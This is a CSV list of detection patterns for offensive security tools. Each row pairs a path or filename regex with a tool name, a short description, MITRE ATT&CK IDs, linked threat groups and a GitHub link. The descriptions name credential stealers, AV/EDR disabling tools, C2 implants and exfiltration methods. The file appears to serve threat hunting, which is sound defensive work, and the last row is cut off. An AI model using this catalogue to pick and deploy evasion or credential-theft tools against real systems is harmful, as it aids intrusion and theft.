"*/dacledit.py*",".{0,1000}\/dacledit\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*/daclread.py*",".{0,1000}\/daclread\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/DAMP.git*",".{0,1000}\/DAMP\.git.{0,1000}","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","10","4","373","78","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z" "*/DanMcInerney/ridenum*",".{0,1000}\/DanMcInerney\/ridenum.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*/daphne.git*",".{0,1000}\/daphne\.git.{0,1000}","offensive_tool_keyword","daphne","evade auditd by tampering via ptrace","T1054.004 - T1012 - T1057","TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/daphne","1","1","N/A","8","1","15","3","2023-08-03T08:31:40Z","2023-07-31T11:57:29Z" "*/daphne-x64*",".{0,1000}\/daphne\-x64.{0,1000}","offensive_tool_keyword","daphne","evade auditd by tampering via ptrace","T1054.004 - T1012 - T1057","TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/daphne","1","1","N/A","8","1","15","3","2023-08-03T08:31:40Z","2023-07-31T11:57:29Z" "*/darkarmour.git*",".{0,1000}\/darkarmour\.git.{0,1000}","offensive_tool_keyword","darkarmour","Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/darkarmour","1","1","N/A","10","7","690","117","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z" "*/DarkCoderSc/*",".{0,1000}\/DarkCoderSc\/.{0,1000}","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","10","1060","181","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z" "*/darkexe.py*",".{0,1000}\/darkexe\.py.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","1","N/A","10","8","739","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" "*/darkhotel.py*",".{0,1000}\/darkhotel\.py.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*/DarkLoadLibrary.git*",".{0,1000}\/DarkLoadLibrary\.git.{0,1000}","offensive_tool_keyword","DarkLoadLibrary","LoadLibrary for offensive operations","T1071.001 - T1055.002 - T1055.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/DarkLoadLibrary","1","1","N/A","10","10","990","199","2021-10-22T07:27:58Z","2021-06-17T08:33:47Z" "*/Darkside.exe*",".{0,1000}\/Darkside\.exe.{0,1000}","offensive_tool_keyword","Darkside","C# AV/EDR Killer using less-known driver (BYOVD)","T1547.006 - T1055 - T1562.001","TA0005 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/ph4nt0mbyt3/Darkside","1","1","N/A","10","2","117","24","2023-11-10T16:01:21Z","2023-11-10T15:34:20Z" "*/Darkside.git*",".{0,1000}\/Darkside\.git.{0,1000}","offensive_tool_keyword","Darkside","C# AV/EDR Killer using less-known driver (BYOVD)","T1547.006 - T1055 - T1562.001","TA0005 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/ph4nt0mbyt3/Darkside","1","1","N/A","10","2","117","24","2023-11-10T16:01:21Z","2023-11-10T15:34:20Z" "*/Darkside.sln*",".{0,1000}\/Darkside\.sln.{0,1000}","offensive_tool_keyword","Darkside","C# AV/EDR Killer using less-known driver (BYOVD)","T1547.006 - T1055 - T1562.001","TA0005 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/ph4nt0mbyt3/Darkside","1","0","N/A","10","2","117","24","2023-11-10T16:01:21Z","2023-11-10T15:34:20Z" "*/darkweb2017-top100.txt*",".{0,1000}\/darkweb2017\-top100\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/DarkWidow.git*",".{0,1000}\/DarkWidow\.git.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","1","N/A","10","5","452","69","2024-04-19T20:15:04Z","2023-07-24T13:59:16Z" "*/data/attacks/*.txt*",".{0,1000}\/data\/attacks\/.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*/data/auxiliary/gather*",".{0,1000}\/data\/auxiliary\/gather.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/data/empire.db*",".{0,1000}\/data\/empire\.db.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*/data/exploits/*",".{0,1000}\/data\/exploits\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/data/nxc.conf*",".{0,1000}\/data\/nxc\.conf.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/data/shellcode*",".{0,1000}\/data\/shellcode.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/DataBouncing.git*",".{0,1000}\/DataBouncing\.git.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","1","N/A","9","1","60","9","2024-04-01T07:49:15Z","2023-12-04T07:05:48Z" "*/DavRelayUp.git*",".{0,1000}\/DavRelayUp\.git.{0,1000}","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","495","78","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z" "*/DavRelayUp/*",".{0,1000}\/DavRelayUp\/.{0,1000}","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","495","78","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z" "*/daytime.nse*",".{0,1000}\/daytime\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dazzleUP.git*",".{0,1000}\/dazzleUP\.git.{0,1000}","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","9","5","486","69","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" "*/db2_default_userpass.txt*",".{0,1000}\/db2_default_userpass\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/db2-das-info.nse*",".{0,1000}\/db2\-das\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dbc2Loader*",".{0,1000}\/dbc2Loader.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*/DBC-Server.py*",".{0,1000}\/DBC\-Server\.py.{0,1000}","offensive_tool_keyword","dns-black-cat","Multi platform toolkit for an interactive DNS shell commands exfiltration - by using DNS-Cat you will be able to execute system commands in shell mode over DNS protocol","T1140 - T1048.003 - T1071.004","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/lawrenceamer/dns-black-cat","1","1","N/A","10","10","104","20","2022-09-15T18:07:05Z","2021-02-13T11:31:22Z" "*/dbms/fingerprint.py*",".{0,1000}\/dbms\/fingerprint\.py.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","N/A","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*/dbsclrxcvg/b.js*",".{0,1000}\/dbsclrxcvg\/b\.js.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*/DCOM Lateral Movement/*",".{0,1000}\/DCOM\sLateral\sMovement\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","318","52","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z" "*/dcomhijack.git*",".{0,1000}\/dcomhijack\.git.{0,1000}","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM and DLL Hijacking","T1021 - T1021.003 - T1574 - T1574.007 - T1574.002","TA0008 - TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","1","N/A","10","3","242","24","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z" "*/DCOMPotato.git*",".{0,1000}\/DCOMPotato\.git.{0,1000}","offensive_tool_keyword","DCOMPotato","Service DCOM Object and SeImpersonatePrivilege abuse.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/DCOMPotato","1","1","N/A","10","4","340","45","2022-12-09T01:57:53Z","2022-12-08T14:56:13Z" "*/DcRat.git*",".{0,1000}\/DcRat\.git.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","890","331","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*/DcRat.sln*",".{0,1000}\/DcRat\.sln.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","890","331","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*/dcrypt.exe*",".{0,1000}\/dcrypt\.exe.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","10","5","417","103","2024-02-23T14:13:01Z","2019-04-20T14:51:18Z" "*/dcrypt_setup.exe*",".{0,1000}\/dcrypt_setup\.exe.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","10","5","417","103","2024-02-23T14:13:01Z","2019-04-20T14:51:18Z" "*/dcshadow.html*",".{0,1000}\/dcshadow\.html.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*/dcsync_*.txt",".{0,1000}\/dcsync_.{0,1000}\.txt","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*/DDSpoof.git*",".{0,1000}\/DDSpoof\.git.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","1","N/A","9","2","105","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z" "*/ddspoof.py*",".{0,1000}\/ddspoof\.py.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","1","N/A","9","2","105","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z" "*/deadPool.ps1*",".{0,1000}\/deadPool\.ps1.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","1","N/A","9","1","60","9","2024-04-01T07:49:15Z","2023-12-04T07:05:48Z" "*/DeathStar/DeathStar.py*",".{0,1000}\/DeathStar\/DeathStar\.py.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*/deb.parrot.sh/*",".{0,1000}\/deb\.parrot\.sh\/.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/debian/dns2tcp*",".{0,1000}\/debian\/dns2tcp.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","N/A","10","10","164","51","2023-04-18T16:14:42Z","2017-11-23T11:19:53Z" "*/DebugAmsi.git*",".{0,1000}\/DebugAmsi\.git.{0,1000}","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","1","N/A","10","1","89","20","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z" "*/decrypt-chrome-passwords*",".{0,1000}\/decrypt\-chrome\-passwords.{0,1000}","offensive_tool_keyword","decrypt-chrome-passwords","A simple program to decrypt chrome password saved on your machine.","T1555.003 - T1112 - T1056.001","TA0006 - TA0009 - TA0040","N/A","N/A","Credential Access","https://github.com/ohyicong/decrypt-chrome-passwords","1","1","N/A","10","8","765","169","2024-02-08T20:07:35Z","2020-12-28T15:11:12Z" "*/decrypted.dmp*",".{0,1000}\/decrypted\.dmp.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","5","468","55","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" "*/decrypting-lsa-secrets.html*",".{0,1000}\/decrypting\-lsa\-secrets\.html.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/deepce.sh *--install*",".{0,1000}\/deepce\.sh\s.{0,1000}\-\-install.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/deepce.sh*",".{0,1000}\/deepce\.sh.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*/defanger.go*",".{0,1000}\/defanger\.go.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*/DefaultCreds_db.json*",".{0,1000}\/DefaultCreds_db\.json.{0,1000}","offensive_tool_keyword","DefaultCreds-cheat-sheet","One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password","T1110.001 - T1110.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/ihebski/DefaultCreds-cheat-sheet","1","1","N/A","N/A","10","5272","667","2024-04-29T16:57:49Z","2021-01-01T19:02:36Z" "*/Defeat-Defender-V1.2.0.git*",".{0,1000}\/Defeat\-Defender\-V1\.2\.0\.git.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","1","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*/defender-exclusions/*defender*",".{0,1000}\/defender\-exclusions\/.{0,1000}defender.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan 